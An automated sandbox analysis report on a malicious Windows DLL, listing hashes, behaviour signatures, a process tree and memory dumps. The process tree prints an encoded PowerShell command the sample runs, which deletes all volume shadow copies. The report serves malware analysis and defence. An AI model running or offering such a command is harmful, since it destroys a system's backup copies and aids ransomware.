Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:54

General

  • Target

    da74221e6e6eee961014701cd7f8be3805b324a602264b6801e766c4991906be.dll

  • Size

    116KB

  • MD5

    7c5392c2917bc5a8ad60bc1c05192347

  • SHA1

    fa39249bae667a34966b482f7b6da86e62cf094c

  • SHA256

    da74221e6e6eee961014701cd7f8be3805b324a602264b6801e766c4991906be

  • SHA512

    05dd856940b3612b3ba6d72c58e9eefae400cad077d2b4f639b5e8c7c767b2f22e092f47479b742d0d836b1ee6669a84d0bc2cd3fb43cb51829cec4934b3f175

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\da74221e6e6eee961014701cd7f8be3805b324a602264b6801e766c4991906be.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\da74221e6e6eee961014701cd7f8be3805b324a602264b6801e766c4991906be.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:760
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1828
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:908

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/760-56-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp
      Filesize

      8KB

    • memory/760-59-0x00000000027B2000-0x00000000027B4000-memory.dmp
      Filesize

      8KB

    • memory/760-58-0x00000000027B0000-0x00000000027B2000-memory.dmp
      Filesize

      8KB

    • memory/760-60-0x00000000027B4000-0x00000000027B7000-memory.dmp
      Filesize

      12KB

    • memory/760-57-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmp
      Filesize

      11.4MB

    • memory/760-61-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
      Filesize

      3.0MB

    • memory/760-62-0x00000000027BB000-0x00000000027DA000-memory.dmp
      Filesize

      124KB

    • memory/1612-55-0x0000000075F81000-0x0000000075F83000-memory.dmp
      Filesize

      8KB